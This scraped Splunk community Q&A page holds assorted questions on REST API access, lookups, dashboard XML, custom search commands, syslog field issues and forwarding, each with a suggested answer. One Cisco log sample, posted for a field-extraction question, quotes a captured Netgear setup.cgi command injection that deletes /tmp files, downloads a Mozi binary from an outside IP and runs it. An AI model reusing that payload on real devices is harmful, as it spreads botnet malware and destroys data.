
Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

1. How can a non-admin user access the Splunk REST APIs? 2. After getting the session key, search ID, and search status, we try to get the search results, but the response is null.

    curl -u $user:$password -k https://localhost:8089/servicesNS/admin/search/search/jobs/sid/results/ --get

Any comments are much appreciated. Thank you
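Two things worth checking, sketched under assumptions: a non-admin user can call the REST API as long as their role grants the relevant capabilities (such as search), but a job dispatched by that user normally lives under the user's own namespace rather than /servicesNS/admin/..., and the results endpoint returns nothing until the job is done. A minimal illustrative pair of requests, where $sid stands for the actual search ID and output_mode is optional:

    # Check the job status first; results are empty until the job reaches DONE
    curl -k -u $user:$password "https://localhost:8089/servicesNS/$user/search/search/jobs/$sid"

    # Then fetch the results
    curl -k -u $user:$password "https://localhost:8089/servicesNS/$user/search/search/jobs/$sid/results?output_mode=json"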
Cisco logs in JSON format are not extracting properly. I tried these kv delimiters from the GUI in search and they work fine:

    | kv pairdelim="," kvdelim="=:"

But how can I save them? Or is there an alternate way to extract these fields?

    2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"}
    2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}
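Since each event is a syslog header followed by a JSON body, one alternative to kv is pulling out the JSON and letting spath parse it. A minimal search-time sketch:

    | rex field=_raw "(?<json_payload>\{.*\})"
    | spath input=json_payload

To persist it without retyping, one option (with an illustrative macro name) is wrapping this in macros.conf:

    [cisco_nfa_json]
    definition = rex field=_raw "(?<json_payload>\{.*\})" | spath input=json_payload

The kv delimiters could also be saved as a props.conf/transforms.conf search-time extraction, but the rex/spath route tends to handle quoted JSON values (which themselves contain commas) more reliably than pair delimiters.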
Hey Splunkers. Quick question regarding my lookup. I have the Identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbreviated) identity lookup looks like this:

    identity  prefix   nick        priority
    --------  -------  ----------  --------
    asmith    (blank)  Adam Smith  medium
    cjean     (blank)  Carol Jean  medium
    bjean     (blank)  Billy Jean  medium

I'd like to replace the priority value 'medium' in the above lookup with the value that matches my separate lookup, which looks like:

    identity  priority
    --------  --------
    asmith    high
    cjean     low

So the original lookup would become:

    identity  prefix   nick        priority
    --------  -------  ----------  --------
    asmith    (blank)  Adam Smith  high
    cjean     (blank)  Carol Jean  low
    bjean     (blank)  Billy Jean  medium

I'm having trouble getting started on the search. How would I do this so that matches are updated, but if no match is present then the original value is kept? Thanks!
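A minimal sketch of one approach using coalesce(), which keeps the original value when the override lookup has no match; the file names identity_lookup.csv and priority_overrides.csv are illustrative:

    | inputlookup identity_lookup.csv
    | lookup priority_overrides.csv identity OUTPUT priority as override_priority
    | eval priority = coalesce(override_priority, priority)
    | fields - override_priority
    | outputlookup identity_lookup.csv

Writing the override into a temporary field means the original priority survives for rows like bjean that have no match in the second lookup.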
I made a custom TA in "/opt/splunk/etc/apps/myTA/". I created a script called "myTA/bin/scripts/pulldata.sh". My script makes temp files and attempts to save them in "myTA/bin/scripts/", but it gets errors writing to that path. I can run the script from the CLI using "./pulldata.sh" as the splunk user, and then it writes the temp files to the "scripts" directory just fine. I tried "/opt/splunk/bin/splunk cmd /opt/splunk/etc/apps/myTA/scripts/pulldata.sh", but that also has issues writing the temp files. I'm assuming that Splunk only lets scripts write files in specific directories. Is there a specific/correct location where I should be placing these temp files? I'm thinking I could write to "/opt/splunk/var/log/splunk", but I want to know what the Splunk-recommended path is for this kind of thing. I remember seeing information about this at some point on dev.splunk.com, but I can't seem to find it anymore. This is what I have been looking at: https://dev.splunk.com/enterprise/docs/developapps/createapps/appanatomy/ Thanks in advance!
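A minimal sketch of one common convention: write transient files under $SPLUNK_HOME/var/run/splunk, which is generally writable by the splunk user, rather than the app's bin/ directory (which is replaced on app upgrades). The filename pattern below is illustrative:

    #!/bin/sh
    # Resolve SPLUNK_HOME when the script is launched outside 'splunk cmd'
    SPLUNK_HOME="${SPLUNK_HOME:-/opt/splunk}"
    TMP_DIR="$SPLUNK_HOME/var/run/splunk"

    tmpfile=$(mktemp "$TMP_DIR/pulldata.XXXXXX") || exit 1
    # ... write intermediate data to "$tmpfile" ...
    rm -f "$tmpfile"

Keeping scratch data out of bin/ also avoids it being swept up by app packaging or integrity checks, whichever exact directory is chosen.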
I have a dashboard (form) with a dropdown to choose between two different types of "changes" that may have happened in one of our environments. When one of the dropdown options is chosen, a table is populated with results. The dropdown menu is configured:

    <choice value="index=something blah blah blah | table 1 2 3">Config Change</choice>
    <choice value="index=another_index blah blah blah | table 7 8 9">Admin Change</choice>

The table portion is configured:

    <query>$tok_change$</query>

This all works great. I have a need to eval a field called Name in the Config Change "choice". This Name field will have a value of "A change to the system was made." The problem comes in when I add the following to the SPL:

    eval Name="A change to the system was made"

I receive the following message: "Error on line 8: Invalid attribute name". I figure it has something to do with the quotes in the eval statement, but I can't make this work. Any help / guidance is greatly appreciated.
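The error is consistent with the double quotes from the eval terminating the value="..." attribute early, so the XML parser treats the rest as a malformed attribute. A minimal sketch of one fix, switching the attribute to single quotes and escaping the inner quotes as &quot; (the search text is just the original placeholder):

    <choice value='index=something blah blah blah | eval Name=&quot;A change to the system was made&quot; | table 1 2 3'>Config Change</choice>

With single-quoted attributes, plain double quotes are also legal XML, so value='... | eval Name="..." | ...' should work too; &quot; is just the more defensive form.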
We're trying to iterate over the result rows and columns in the same order as the table before the custom command. The 'records' object in the custom command code iterates in row order, but changes the order of the columns.

    def reduce(self, records):
        for record in records:
            yield record

This example of the reduce method of a ReportingCommand prints the results in a different column order than the original search. We need to iterate 'records' in the same order of rows and columns. Any ideas?
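A minimal sketch of one approach, hedged as an assumption about this SDK version: rebuild each record as an OrderedDict in an explicitly supplied column order before yielding, so the writer sees the fields in the intended sequence. DESIRED_ORDER is an illustrative name holding the column order of the originating search:

    from collections import OrderedDict

    DESIRED_ORDER = ['host', 'source', 'count']  # illustrative

    def reduce(self, records):
        for record in records:
            ordered = OrderedDict((f, record[f]) for f in DESIRED_ORDER if f in record)
            # Append any fields not covered by the explicit order
            for f in record:
                if f not in ordered:
                    ordered[f] = record[f]
            yield ordered

If the record writer still reorders fields after this, the ordering is being imposed downstream of reduce() and would need addressing in how the output chunk's fieldnames are emitted.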
I've uploaded the Splunk tutorial data successfully into my Splunk Enterprise instance. There is also a prices.csv.zip. Do I upload that file the exact same way as the tutorialdata.zip?
I am currently using the Splunk TA for Palo Alto data, and I'm ingesting data from Cortex Data Lake to a new Azure syslog server. But there is a large problem with the data we're ingesting: the data being sent is missing a single field. Below is a reference for what we should be ingesting: Configuration Syslog Field Order (paloaltonetworks.com). If you look at the example from this link, you will see this log:

    Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - 1,2020-10-13T20:56:03.000000Z,007051000113358,CONFIG,config,,2020-10-13T20:56:00.000000Z,xxx.xx.x.xx,,rename,admin,,submitted,/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],150,-9223372036854775808,0,0,0,0,,PA-VM,,,,2020-10-13T20:56:00.284000Z

But what I'm receiving is:

    Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - 2020-10-13T20:56:03.000000Z,007051000113358,CONFIG,config,,2020-10-13T20:56:00.000000Z,xxx.xx.x.xx,,rename,admin,,submitted,/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],150,-9223372036854775808,0,0,0,0,,PA-VM,,,,2020-10-13T20:56:00.284000Z

In the log I'm receiving, the first CSV field and its comma are missing before the 2020 in this line:

    harness-16kn logforwarder - panwlogs - 2020-10-13T20:56:03.000000Z

I should be receiving data that looks like this:

    harness-16kn logforwarder - panwlogs - 1,2020-10-13T20:56:03.000000Z

I'm at a loss as to where this data is generated: by the syslog server software, the Unix server hosting syslog, or on the Palo Alto Cortex Data Lake side of things. The logs pass through our firewall to the syslog server. I believe the missing field is either 'log_source_id' or 'log_type.value', but beyond that I'm at a loss as to where this value is generated. Any help is appreciated.

- TitanAE
The Python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but when using the debugger it crashes at the dispatch() function and returns the following traceback:

    Traceback (most recent call last):
      File "/opt/splunk/etc/apps/<app>/bin/<command>.py", line 149, in <module>
        dispatch(exportExcel, sys.argv, sys.stdin, sys.stdout, __name__)
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 1144, in dispatch
        command_class().process(argv, input_file, output_file, allow_empty_input)
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 450, in process
        self._process_protocol_v2(argv, ifile, ofile)
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 788, in _process_protocol_v2
        self._record_writer.write_metadata(self._configuration)
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 813, in write_metadata
        self._write_chunk(metadata, '')
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 843, in _write_chunk
        self.write(start_line)
      File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 557, in write
        self.ofile.write(data)
      File "/opt/splunk/etc/apps/SA-VSCode/bin/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_io.py", line 40, in write
        r.write(s)
    TypeError: write() argument must be str, not bytes

The custom command code is similar to the Python examples in the SDK repo at https://github.com/splunk/splunk-sdk-python/tree/master/examples/searchcommands_app/package/bin. Any help will be appreciated.
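The traceback suggests the debugger's stdout redirection (pydevd_io) only accepts str, while the SDK's protocol v2 writer emits bytes. A minimal sketch of one possible workaround, hedged as an assumption about this setup: hand dispatch() the underlying binary buffers so writes bypass the debugger's text wrapper:

    import sys

    # sys.stdout may be wrapped by the debugger; .buffer (when present) is the
    # underlying binary stream that the SDK writes its bytes chunks to.
    ifile = getattr(sys.stdin, 'buffer', sys.stdin)
    ofile = getattr(sys.stdout, 'buffer', sys.stdout)
    dispatch(exportExcel, sys.argv, ifile, ofile, __name__)

If the debugger's wrapper object exposes no .buffer attribute, this falls back to the wrapper itself and the crash would persist; in that case, patching the wrapper's write() to accept bytes would be the next thing to try.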
We have upgraded from 8.1.6 to 8.1.7.2 and we can no longer see the resource details on the overview page (screenshot attached). Kindly advise. Is this a known issue?
Hi, I looked for an answer and some came close, but I could not get it flying. Here is the problem description: I have a field that contains the status of a ticket ("created_done"). I can easily count the statuses by doing this:

    | stats count(eval(created_done="created")) as created count(eval(created_done="done")) as done by title impact

However, I would like something like this:

    | stats count by title impact status

where status at this point is a field holding the number of solved tickets and the number of open tickets:

    Title    Impact    Status  Count
    -------  --------  ------  -----
    title 1  impact 1  solved  90
    title 1  impact 1  open    5
    title 1  impact 2  solved  45
    title 1  impact 2  open    3

Probably this has already been answered, I apologize in advance, but I could not get any solution working.

Kind regards, Mike
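A minimal sketch, assuming "done" maps to solved and "created" maps to open (the label mapping is illustrative):

    | eval status=case(created_done="done", "solved", created_done="created", "open")
    | stats count by title impact status

Deriving status with eval first gives stats a real field to group by, producing one row per title/impact/status combination as in the desired table.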
Every time I modify the pass4SymmKey in outputs.conf that I need in order to forward to a different Splunk environment, it ends up getting rewritten to the pass4SymmKey that is in server.conf. How do I set two different pass4SymmKey values, one for my own Splunk environment and one for the other environment I need to forward logs to?
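If the second environment is reached via indexer discovery, outputs.conf supports a per-stanza pass4SymmKey that is independent of the one in server.conf. A minimal sketch with illustrative stanza names and URIs:

    # outputs.conf
    [indexer_discovery:other_env]
    pass4SymmKey = <key shared with the other environment's cluster manager>
    master_uri = https://other-env-cm.example.com:8089

    [tcpout:other_env_group]
    indexerDiscovery = other_env

One thing to keep in mind: Splunk re-encrypts any cleartext pass4SymmKey on restart, so seeing the value rewritten to an encrypted $7$... string is expected and does not by itself mean it was replaced by the server.conf key.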
Hi all, during a scan of our infra, our system detected that in Splunk version 8.1.7.1 the log4j library vulnerable to CVE-2021-44228 is still present. Prior to the upgrade to this version, we deleted the compromised files following the workaround in the Splunk blog on this topic. As this version has that vulnerability patched, I'd like to know how the patching process works, given that log4j files are still present in the affected version. Thanks in advance for your help. Best regards.
Hi Splunkers, is it feasible to collect data from a DB2/AS400 server using Splunk? i.e. to collect the required data that is stored in a DB2 database hosted on an AS400 server. Thanks in advance! Cheers!
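One common approach is Splunk DB Connect with a JDBC driver; for DB2 on IBM i (AS/400), the open-source jt400 (JTOpen) driver is frequently used. A minimal sketch of the connection parameters, with illustrative host and library names, and hedged on DB Connect version and driver packaging details:

    # illustrative DB Connect connection settings
    jdbcDriverClass = com.ibm.as400.access.AS400JDBCDriver
    jdbcUrlFormat   = jdbc:as400://myas400host/MYLIB

With a working connection, dbxquery or a scheduled DB input can then pull the required tables into Splunk.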
Hello, can anybody recommend an add-on for finding the reputation of an IP in search results? With high hopes, I downloaded the VirusTotal app (https://splunkbase.splunk.com/app/4283/#/details), but was disappointed to find that it does not show a reputation score for an IP field. It does show one for file hashes, domains, and URLs, but not for IPs. The requirement is for a TA or add-on that we can use in our own searches to get the IP reputation as a field in the results.
I added a new index to my enterprise server, but on the indexer I cannot add it because the UI will not allow me to select the custom app.
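If the UI won't offer the custom app as a destination, one workaround is to create the index directly in that app's local indexes.conf on the indexer. A minimal sketch with illustrative names:

    # $SPLUNK_HOME/etc/apps/my_custom_app/local/indexes.conf
    [my_new_index]
    homePath   = $SPLUNK_DB/my_new_index/db
    coldPath   = $SPLUNK_DB/my_new_index/colddb
    thawedPath = $SPLUNK_DB/my_new_index/thaweddb

A restart of the indexer (or a configuration push from the cluster manager, if clustered) would be needed for the index to appear.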
Hi, I have a requirement where the drilldown panel's query should change based on the token value passed from the parent panel. Right now the condition is: the parent panel passes a token whose value is either SUCCESS or FAILURE. If it is FAILURE, the drilldown panel should execute one query, and for SUCCESS it should execute a different one.
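A minimal Simple XML sketch using <condition> inside the parent panel's drilldown to set the query token; the token name, click field, and searches are illustrative:

    <drilldown>
      <condition match='$click.value$ == "FAILURE"'>
        <set token="drill_query">index=myindex status=FAILURE | table _time message</set>
      </condition>
      <condition>
        <set token="drill_query">index=myindex status=SUCCESS | stats count by host</set>
      </condition>
    </drilldown>

The drilldown panel's search then just references $drill_query$; the final bare <condition> acts as the fallback for the SUCCESS case. The match attribute on <condition> requires a reasonably recent Splunk version.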
I got the 'Phantom Community Edition - Access Granted' mail, but the registration link had expired and I can't access it. https://my.phantom.us/registration_complete?token=ogxEhOMPccGvtrxBBIES6bhs61fpIdDspcGa2lyca44w4opts6XQuEzTA3WQDJFY Could you send a new link?
I want to limit the search to events whose "dest" values are part of a lookup. Currently I am getting all events.

Lookup: host.csv
Lookup columns: aa bb

I tried something like this:

    | tstats summariesonly=f count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (condition) [| inputlookup host.csv | fields + aa | rename aa as Processes.dest] by Processes.dest

Any help would be appreciated! Thanks
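For reference, a minimal sketch of how this subsearch pattern is commonly written (essentially the query above, with the (condition) placeholder kept as-is):

    | tstats summariesonly=f count min(_time) as firstTime max(_time) as lastTime
        from datamodel=Endpoint.Processes
        where (condition) [| inputlookup host.csv | fields aa | rename aa as Processes.dest]
        by Processes.dest

The subsearch should expand to (Processes.dest="host1" OR Processes.dest="host2" ...). If all events still come back, inspecting the expanded search string in the Job Inspector would show whether the rename is actually producing Processes.dest terms, and whether the aa values match the datamodel's dest values exactly.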
I want to have a search whose output feeds the next search, provided that each occurred at a common time. For example: a source on a specific port connects to several destinations, and then those destinations become the sources of the next search, provided that each occurred at the same time.

search 1:

    index=fgt src=172.26.122.1 dest_port=443 (dest=172.20.120.1 OR dest=172.20.120.2) | stats count by src,dest,_time

search 2 (the destinations from search 1 become the sources):

    (src=172.20.120.1 OR src=172.20.120.2) | stats count by src,dest,_time
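A minimal sketch of one way to chain them, feeding the destinations found by search 1 into search 2 as sources via a subsearch; the time bucketing suggested afterwards is an illustrative choice:

    index=fgt
        [ search index=fgt src=172.26.122.1 dest_port=443 (dest=172.20.120.1 OR dest=172.20.120.2)
          | fields dest
          | rename dest as src ]
    | stats count by src, dest, _time

The rename makes the subsearch expand to (src=172.20.120.1 OR src=172.20.120.2) in the outer search. To enforce the common-time condition rather than exact _time equality, one option is to bucket both legs with | bin _time span=1m and compare the bucketed times, since raw _time values will rarely match exactly.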